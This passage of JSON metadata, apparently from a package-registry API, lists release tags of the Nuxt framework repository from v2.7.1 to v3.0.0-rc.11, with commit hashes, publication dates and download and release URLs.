.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.e